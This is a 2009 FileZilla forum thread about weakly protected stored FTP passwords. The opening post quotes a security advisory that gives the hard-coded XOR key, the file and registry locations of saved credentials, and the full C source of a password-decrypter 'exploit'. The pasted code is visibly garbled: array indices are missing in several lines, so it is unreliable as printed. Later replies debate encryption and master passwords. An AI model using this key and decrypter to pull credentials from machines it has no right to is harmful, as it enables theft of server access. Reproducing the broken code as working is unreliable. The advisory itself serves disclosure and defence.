FileZilla Weak Password Encryption

Come here to discuss FileZilla and FTP in general

Moderator: Project members

Post Reply
Message
Author
Hester
500 Command not understood
Posts: 4
Joined: 2009-01-08 09:05

FileZilla Weak Password Encryption

#1 Post by Hester » 2009-01-08 09:13

Hi, I'm new here.

I've been using Filezilla FTP Client for a long time but only recently tried out Filezilla FTP Server. I came across this article saying Filezilla FTP Server has weak encryption, but, they are talking about versions 2.2.14b and 2.2.15. What about now? What do you think?

Hope to know more about this. I've already tried the server. Found it to be easy to use. Am keen on using it.

http://www.securiteam.com/windowsntfocu ... 2KGVW.html
Vulnerable Systems:
* FileZilla versions 2.2.14b and 2.2.15

FileZilla saves configuration settings in two different locations:
* In an XML file
* In the Windows registry

The method used to save configuration settings depends on the preferences used by the user during the installation of FileZilla. Either way, all configuration settings are stored in cleartext, EXCEPT for the password. However, the password is stored using very weak XOR "encryption" which can be easily reversed.

There exists a problem in the way the XOR encryption is implemented because the same cipher key is always used. This key is hard-coded, which means that anyone can analyze the source code of the application and find it. Of course, this wouldn't be so easy if FileZilla wasn't an open source application.

Once the key is known, an attacker can use it to decrypt the password back to its cleartext form. Because the XOR cryptographic algorithm used is symmetric, the same key is used for both, encrypting and decrypting.

As mentioned before, the rest of the configuration settings are all in cleartext. Some information that would be useful for an attacker includes hostname of the server to connect to, default port, and username.

If successfully exploited, this vulnerability will allow an attacker to access FTP (or SFTP) servers with the privileges of the user whose configuration settings were stolen from.

In practice, this vulnerability could be exploited after a machine has been compromised, or by fooling the user into executing malicious code. Such code could dump the configuration settings, decrypt the password/s and sends them all to the attacker.

It is common to see many popular trojans out there that exploit weak encryption vulnerabilities of this type. These trojans dump the credentials of popular applications such as Internet Explorer, VNC or even dialup connections. FileZilla could be the next added application in the list of all those trojans with password-dumping features.

This vulnerability is somehow similar to the one found by Conde Vampiro in VNC 3 back in 1999. It's similar because in both cases we find an open source application using a fixed cipher key to decrypt passwords. Thus, making trivial to find the key.

For more information on Conde Vampiro's findings visit: http://www.securiteam.com/securitynews/3P5QERFQ0Q.html

The XML configuration file is found at: %programfiles%\FileZilla\FileZilla.xml
The configuration settings are saved in the registry in:
Hive: HKEY_CURRENT_USER
Key: Software\FileZilla\Site Manager\[site_name]\
Where [site_name] is the name given to the connection by the user.
The password is saved in the previous key as a value with the following properties:
Value: Pass
Type: REG_SZ (string terminated in NULL)

The cipher key can be found in Crypt.cpp and its value is: FILEZILLA1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ

Solution:
Choose "Use secure mode" during the installation (this disables FileZilla from saving passwords), lockdown your client machines where the FileZilla client is installed, or update to a patched version which fixes this issue (if available).

Password Decrypter Code:
/*

Filename: filezilla-pwdec.c
Title: FileZilla Client - Weakly encrypted password exploit v0.01
Author: pagvac (Adrian Pastor)
Date: 8th August, 2005
License: GPL
email: m123303[-a-t-]richmond.ac.uk
homepage: http://www.ikwt.com (In Knowledge We Trust)
http://www.adrianpv.com

Description: this tool asks the user for the "encrypted" password and
computes the cleartext version of the password

Other info: compile as a Win32 console application project in Visual C++

Copyright (C) 2005 pagvac (Adrian Pastor)

This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
02110-1301, USA.

*/


//Includes
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <windows.h>

//Macros
#define MAX_SIZE 150
#define SLEEP_TIME 5000

//Global variable (cypher key)
char *m_key = "FILEZILLA1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ";


//PRE: decimal values representing ASCII chars,
// every three digits becomes one ASCII char
// e.g.: 042040063063
//POST: ASCII chars are copied back to buff[]
// e.g.: *(??
// the length of the new string is returned
int digit2char(char buff[])
{
char tmp_buff[4], ascii_buff[MAX_SIZE];
unsigned int i=0, j=0, n=0, len=(strlen(buff)/3);
for(i=0,j=0;i<strlen(buff);i+=3,++j)
{
tmp_buff[0]=buff;
tmp_buff[1]=buff[i+1];
tmp_buff[2]=buff[i+2];
tmp_buff[3]='\0';

n=atoi(tmp_buff);
ascii_buff[j]=(char)n;
}
ascii_buff[j]='\0';
printf("ascii_buff:%s\n", ascii_buff);
strcpy(buff, ascii_buff);

return len;
}

//PRE: buffer containing ASCII chars of cypher
// (rather than their numberic ASCII value)
//POST:length of cleartext password is returned
unsigned int decrypt(char buff[])
{
unsigned int i, pos, len;

len=digit2char(buff);
pos=len%strlen(m_key);

for (i=0;i<len;i++)
buff=buff^m_key[(i+pos)%strlen(m_key)];

return len;
}

int main(void)
{
char cypher[MAX_SIZE];
unsigned int len=0,i=0;

printf("Enter cypher (encrypted password)\ne.g.: 120125125112000\n->");
scanf("%s", cypher);
if(strlen(cypher)%3==0)
{
len=decrypt(cypher);
printf("cleartext password:");
for(i=0;i<len;++i)
printf("%c",cypher);
printf("\n");
}
else
{
printf("You didn't enter a valid cypher!\n");
printf("It should be a numeric value whose length is multiple of 3\n");
}

printf("Ending program in %d seconds...\n", SLEEP_TIME/1000);
Sleep(SLEEP_TIME);
return 0;
}

User avatar
botg
Site Admin
Posts: 31510
Joined: 2004-02-23 20:49
First name: Tim
Last name: Kosse
Contact:

Re: FileZilla Weak Password Encryption

#2 Post by botg » 2009-01-08 10:51

That advisory is nonsense. In the old 2.x client the passwords are not encrypted, there are merely obfuscated. For this reason it is expected that it is easy to get the plaintext password.
For this reason I dropped the nonsense obfuscation in 3.x and just store the plaintext passwords. It's task of the operating system to protect your private data.

The server stores passwords in form of MD5 hashes, those are not reversible.

maathieu
500 Command not understood
Posts: 5
Joined: 2009-09-07 11:22
First name: maathieu
Last name: maathieu

Re: FileZilla client Weak Password Encryption

#3 Post by maathieu » 2009-09-07 11:37

How about implementing a master password system in the FileZilla client, just like the one in Firefox and Thunderbird?

Pros:
- Passwords are not immediately accessible to an unexpected user (laptop/USB key stolen, trojan horse in the machine),
- Only one password required to be remembered in order to access them all,
- Password file can be encrypted using master password as a key, thus immune to "laptop/usb key stolen" attacks and other common social engineering issues (PC goes to maintenance, and so on).

Cons:
- will not work if there is a keylogger or similar software on the machine (but in that case, you're pretty much screwed anyway).

This will not give a false pretense of security (since your passwords ARE protected as long as the attacker doesn't know the master password). And please, it's not the task of the OS to protect your private data. We're talking about Windows here!

User avatar
botg
Site Admin
Posts: 31510
Joined: 2004-02-23 20:49
First name: Tim
Last name: Kosse
Contact:

Re: FileZilla Weak Password Encryption

#4 Post by botg » 2009-09-07 14:21

Simply encrypt your home directory. Your login password is then your master password.

Spengbab
500 Command not understood
Posts: 1
Joined: 2009-10-06 03:25
First name: Dave
Last name: Dulihanty

Re: FileZilla Weak Password Encryption

#5 Post by Spengbab » 2009-10-06 03:29

botg wrote:Simply encrypt your home directory. Your login password is then your master password.
I'm sorry, that's an acceptable solution to poorly written software how?

I couldn't count the amount of people who have had their sites hacked because FileZilla makes it easy to capture their passwords. it's gotten to the point where I've stopped recommending FileZilla to customers because of the fact.

Perhaps if you worked in the web hosting industry you might think that security was a little more important.

User avatar
xicrozxadanz
504 Command not implemented
Posts: 9
Joined: 2009-10-03 11:54
First name: Xicroz
Last name: Xadanz
Location: Nepal
Contact:

Re: FileZilla Weak Password Encryption

#6 Post by xicrozxadanz » 2009-10-06 04:30

I think Weak Password Encryption is the main problem with FZ. When Developers Eyes go here ???

User avatar
boco
Contributor
Posts: 24118
Joined: 2006-05-01 03:28
Location: Germany

Re: FileZilla Weak Password Encryption

#7 Post by boco » 2009-10-06 15:04

FileZilla does not encrypt passwords.
### BEGIN SIGNATURE BLOCK ###
No support requests per PM! You will NOT get any reply!!!
FTP connection problems? Do yourself a favor and read Network Configuration.
All FileZilla products fully support IPv6. http://worldipv6launch.org
### END SIGNATURE BLOCK ###

maathieu
500 Command not understood
Posts: 5
Joined: 2009-09-07 11:22
First name: maathieu
Last name: maathieu

Re: FileZilla Weak Password Encryption

#8 Post by maathieu » 2009-11-26 14:50

boco wrote:FileZilla does not encrypt passwords.
Firefox does. Thunderbird does. Why is it such a pain to get people acknowledging that it is a necessity for Filezilla too? If the firefox guys can code a master password system, surely the filezilla guys can, too?

etosan
500 Command not understood
Posts: 2
Joined: 2009-12-08 15:04
First name: Martin
Last name: Mišúth

Re: FileZilla Weak Password Encryption

#9 Post by etosan » 2009-12-08 15:39

maathieu then go on and code it. If it will be quality code it might get accepted by other devs.
I was using firefox master password for some time and frankly I do believe it's bullshit. OS should take care of that. Even on windows you can reasonably protect your passwords by granting correct ACLs.

Post Reply